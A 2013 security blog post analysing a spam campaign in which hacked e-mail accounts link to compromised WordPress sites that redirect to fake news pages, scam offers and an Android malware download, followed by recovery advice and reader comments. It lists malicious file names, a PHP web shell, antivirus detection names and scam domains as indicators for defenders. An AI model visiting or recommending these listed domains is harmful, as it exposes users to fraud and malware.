Saturday, January 19, 2013

Hacked E-mails and Web Sites Pushing Weight Loss Drug Spam, Round 2

Six months ago, in July 2012, I wrote about "Hacked E-mails and Web Sites Pushing Weight Loss Drug Spam."

Now in January 2013, hackers and scammers are up to the same tricks.

(If you believe you may have been victimized, you can skip to the bottom for suggestions.)

I've recently received three e-mails from two hacked Yahoo! accounts owned by people I know. Each e-mail contained only a link and no explanatory text, and the subject line was blank.

In each case, the link address contained a directory called "wp-content" which indicates that all these spammed pages were hosted on hacked WordPress blogs (although I later discovered other hacked sites without wp-content in the URL).

At least one of these hacked blogs was using an outdated version of WordPress (3.3.1). One site didn't display the version number. Surprisingly, the third hacked site was actually running the current version of WordPress (3.5). Most often when I've seen hacked WordPress sites they've been running an old version of WordPress for which there are publicly disclosed vulnerabilities.

If a victim clicks on the link in one of these e-mails that appears to be from someone they know, they are redirected to a page that either says "You see this page because one of your friends have invited you. Page loading, please wait...." or else it automatically redirects right away or in 1 to 5 seconds.

The victim is then redirected to one of three types of sites:
  1. a fake Fox news site advertising a "Raspberry Ultra Drops" weight loss drug, which the site implies is endorsed by television host Dr. Oz (see screenshot below)
  2. a fake CNBC news site advertising a "work from your home" scam; see my June 2012 article about related fake news sites at Sophos' Naked Security blog for lots of details and screenshots
  3. a site specifically for those who clicked on the e-mail link on an Android device (which reportedly attempts to install Android malware; see below)
A fraudulent site purporting to be Fox News

Based on an article at Lookout Mobile Security and one of the comments there, apparently the Android-specific redirection leads to (or at one time led to) a file named "Update.apk", a malicious Android app. It appears that as of the last time this file was uploaded to VirusTotal, 32 out of 46 antivirus engines detected it as malware and identified it as one of the following:

Andr/Notcom-A, Android_dc.MK, Android:NotCom-A [Trj], Android.Notcompatible, Android.Notcompatible.A4ad, Android.Proxy.1.origin, Android.Troj.Undef.(kcloud), Android.Trojan.NotCompatible.A, Android.Trojan.NotCompatible.A (B), Android/NoComA.A, Android/NotCompatible.A!tr.bdr, Android/NotCompatible.A.2, AndroidOS_FAKEUPDATES.VL, AndroidOS/GenBl.0B2E9A9E!Olympus, AndroidOS/MalAndroid, Backdoor.AndroidOS.Nisev.a, Backdoor/AndroidOS.bqz, Backdoor/AndroidOS.Nisev, HEUR:Backdoor.AndroidOS.Nisev.a, NotComp.A, TROJ_GEN.F47V1211, Trojan, Trojan:AndroidOS/NoCom.A, Trojan.AndroidOS.NoCom, Trojan.AndroidOS.NoCom.a (v), Trojan.Nisev.bdokyh, UnclassifiedMalware

Following are some various file names that may be found in a directory on one of the hacked sites. Based on my investigation into the similar hack/spam/fraud campaign last July, I am certain that this is not an exhaustive list of file names. (In fact, I observed that additional files with different names appeared within just the past few hours on one hacked site while I was writing this article.) Note that the links below lead to VirusTotal scan reports, NOT the files themselves.

111a.php, addht.php, avmdkg.php, bhesp.php, biokrls.html, bjsdvs.php, bonuspack.php, casualwor.php, cizxusod.php, colsdj.php, conneng.php, creatives.php, curioso.html, dgjdgs.php, dsfv.php, dspvs.php, duna.php, dwncst.php, ebolsg.php, enjslol.html, eopikal.html, etheha.php, fbgogos.php, firstfight.php, fkbmns.php, fogjlop.html, foglsd.php, fpbs.php, frnds.php, fusion.php, fvcagex.php, fvjsvg.php, gbdlg.php, gdkedns.php, geopic.php, gfobnd.php, ghsakl.html, gjuk.php, gnslfs.php, gsm.php, hamiltons.php, hellodear.php, helpsx.php, hposvds.php, ikhkjskl.php, j.php, jhikdba.php, kawabagga.html, kawabangas.php, kllem.php, mainats.php, maincl.php, mainx.php, makoler.html, ndold.php, newinform.php, newsts.php, nextgt.php, nmklsi.php, nwmslck.php, odnhgls.html, ofneg.php, ornvls.php, pdklsa.php, pmcntr.php, privsek.html, rcccy.php, rcctm.php, ronnd.php, rtebcsw.php, SanFrancisco.htm, saweg.php, stesa.php, stndrt.php, unitds.php, upmlc.php, vghjdk.php, vozivapso.php, wmnhl.php, wrvfsfd.php, xdll.php, xhjg.php, xxxxjs.php, yahmlc.php, yepyep.php, yiTUdso.html, youranswerrr.php, zjgfnwe.php

These files have rather low detection rates by major antivirus engines; a few redirection files are currently not detected at all, while some are only detected by as many as 14 out of 46 engines. Thus there's a pretty good chance that your antivirus software won't detect these Web pages as malicious. The files are identified as any of the following types of malware (or similar names):

HTML:Redirector-AI, HTML:Redirector-AI [Trj], HTML:RedirME-inf, HTML:RedirME-inf [Trj], HTML:Refresher-A, HTML:Refresher-A [Trj], HTML.Redirector, HTML.RedirME, HTML.Refresher, JS:Redirector-AAC [Trj], JS.A.Redirector.336, JS.A.Redirector.340.A, JS.A.Redirector.341, JS.A.Redirector.412.A, JS/Redirector.PN, JS/Redirector.WB!tr, TROJ_GEN.F47V0108, TROJ_GEN.F47V0109, TROJ_GEN.F47V0114, TROJ_GEN.F47V0115, TROJ_GEN.F47V0116, TROJ_GEN.F47V0118, TROJ_GEN.F47V1228, TROJ_GEN.F47V1229, TROJ_GEN.RCBH1I4, TROJ_GEN.RCBH1I5, TROJ_GEN.RCBH1IA, TROJ_GEN.RCBH1IK, TROJ_GEN.RCBH1J8, TROJ_GEN.RCBH1JN, Trojan.JS.Redirector, Trojan.JS.Redirector (A), Trojan.JS.Redirector.ASR, Trojan.JS.Redirector.ASR (B), Trojan.JS.Redirector.wb, UnclassifiedMalware

One file was rather different from the rest: gsm.php. This file had an 18/46 detection rate on VirusTotal, and it was identified as a PHP shell backdoor by the antivirus engines that detected it:

Backdoor, Backdoor:PHP/C99shell.R, Backdoor.HTML.EMO.D, Backdoor.HTML.PHPShell-Interface (v), Backdoor.PHP.C99Shell, C99Shell.CX, EXP/C99Shell.W, Exploit.C99Shell.Gen, HTML:Shellface-D, HTML:Shellface-D [Trj], HTML/Shellnine.A, PHP/BackDoor.AO, PHP/C99Shell.A, PHP/C99shell.R, PHP/CShell.Y, Trojan.Html.C99Shell.dwlsk, Trojan/PHP.Shell

Following is a list of some of the domains to which these pages attempt to redirect. Note that the links below lead to the Web of Trust reports for each domain, NOT the domains themselves.

194.60.242.54 (the site hosting Android malware), allnewsjob.ru, foxfoxnws.com, foxfxnws.com, foxnews.top10.super.fxpublication.com (a subdomain of fxpublication.com), fx-nwstop.com, fxnew12.com, fxs-news.com, fxsclocks.com, fxsnws24.com, fxsyounews.com, fxx-news.com, fxxnws24.com, greatlifechance.net, homeincomenow10.com, homeincomenow6.com, hot-foxnws.com, journals26.com, life-news1241.ru, lifenews241.ru, msnb21.com, msnb24c.com, mynewstop.com, news1241.ru, newsfoxs.com, newsonlinework.com, njournal24.com, nws5fxs.com, nwsfxs.com, online18work.com, onlinebestnews.ru, raspberryhots.com (purchasing site), raspbuyberry.com (purchasing site), rasptrims.com (purchasing site), slimsfox.com, story29.com, story76.com, topfox24.com, toplastnews.ru, workfromyourhome15.com, workfromyourhome8.com, workinghome31.com, workinghome46.com, workinghome47.com, xtranws.com

What To Do If Your E-mail Account Has Been Hacked

If your e-mail account has been hacked and you can still log into it, change your password immediately, and be sure to use a good, strong, long, and unique password; if you need some advice, read the detailed explanations of what makes a password secure at GRC's perfect passwords and password haystacks pages. Keep your new password exclusive to this e-mail account; don't reuse your password on any other site. Send an e-mail to your contacts (please use BCC rather than To or CC) asking them to delete any recent e-mails from your account that just contained a link (and if you want, you can suggest that they read this article if they clicked on the link). If you used your old password on any other sites, change your passwords at those sites as well (and be sure to use different passwords than the new one you just created for your e-mail account). If your e-mail provider has security questions as a backdoor if you forget your password (e.g. Yahoo!), change your security questions and answers, and be sure to not choose answers that other people might know or be able to find out about you. It wouldn't hurt to scan your computer for malware (and get a second opinion from a trusted free scanner, for example Windows Defender Offline or another antivirus boot disc, or Sophos' Virus Removal Tool which can be run alongside your existing antivirus software). If your e-mail provider has an option to enable two-factor authentication (for example, sending you a code via SMS text message whenever someone tries to log in), enable this option for better security. Never log into your e-mail from a public computer (for example at a hotel or library) or while connected to a public Wi-Fi network (for example at a restaurant, coffee shop, or airport). See also this Sophos article for additional tips on how to protect your e-mail accounts.

What To Do If Your Web Site Has Been Hacked

If your Web site has been hacked, don't merely delete the files listed above. If possible, restore your server from a clean backup. Scan for rootkits and other malware (and get a second opinion from a trusted free scanner, for example Windows Defender Offline or another antivirus boot disc). Change all passwords on the server, and be sure to use good, strong, long, and unique passwords; if you need some advice, read the detailed explanations of what makes a password secure at GRC's perfect passwords and password haystacks pages. Disable any services you don't use on your server. Make sure all the software on the server (WordPress, Apache, etc.) is up to date and has all the latest security patches. See also this Sophos article for additional tips on how to protect your Web servers.

What To Do If You Clicked On a Link

If you clicked on a link in one of these e-mails, don't panic. If you entered your credit card number on one of the sites, call your credit card provider to report the fraudulent transaction and follow their instructions and advice; you may need to cancel that card number and get a new card. If you visited a link on your Android device, you probably only need to worry about infection if you installed the Update.apk file. If you installed it, you can try restoring your Android device from a backup (assuming you have one) and/or install antivirus software such as Sophos Mobile Security (which is free) onto your device to clean up the infection. If you visited a link on your PC, for your own peace of mind you may wish to scan your computer for malware (and get a second opinion from a trusted free scanner, for example Windows Defender Offline or another antivirus boot disc, or Sophos' Virus Removal Tool which can be run alongside your existing antivirus software). If you visited a link on your Mac, for your own peace of mind you may wish to scan your computer for malware (if you don't have antivirus software, you can get free Mac antivirus software from Sophos for home use, or get a free trial of a security suite from Intego). If you visited a link on your iPhone or iPad, you probably don't have anything to worry about as long as you didn't enter your credit card information on one of the sites.


For more from the JoshMeister on Security, please subscribe via e-mail or RSS, or follow me on Twitter or .

3 comments:

  1. Hi,

    I got hit with this a couple days ago. I opened a weird message from my wife "i have sent you a skype message
    Read your mail friend request" and the next thing that occurred was that a similar message was sent to ever contact from my Mac Mail. I have run 6 of the antivirus programs that you reported are able to find this bug. No antivirus software has found any suspicious files on my Mac. I am still concerned about my security and wonder if you have any other suggestions other than changing passwords (which is done)?

    Thanks,

    Darren

    ReplyDelete
  2. Darren, sorry for my delayed response.

    Since you mention that you're using a Mac, hopefully you already have an antivirus suite installed such as Sophos Anti-Virus for Mac Home Edition (freeware) or Intego VirusBarrier (commercial). I definitely recommend scanning with one of those and leaving it installed.

    I would suggest also trying AdwareMedic (freeware/donationware), a new program developed by my friend Thomas Reed of The Safe Mac — see http://www.adwaremedic.com for a direct download link. You can also try malware scanners available on the Mac App Store. Here are a few that are worth trying, in alphabetic order:

    * Bitdefender Virus Scanner (free)
    * ClamXav (freeware/donationware) — note that there's a more fully featured version at http://www.clamxav.com/download.php
    * Dr.Web Light (used to be free; now $16.99 if you haven't downloaded it previously)

    If you still don't find anything malicious after also scanning with four (or more) of those programs, your Mac likely isn't infected. Hope that helps.

    ReplyDelete

Comment moderation is enabled. (If you wish to contact Josh privately, you can leave a comment and ask that it not be published.)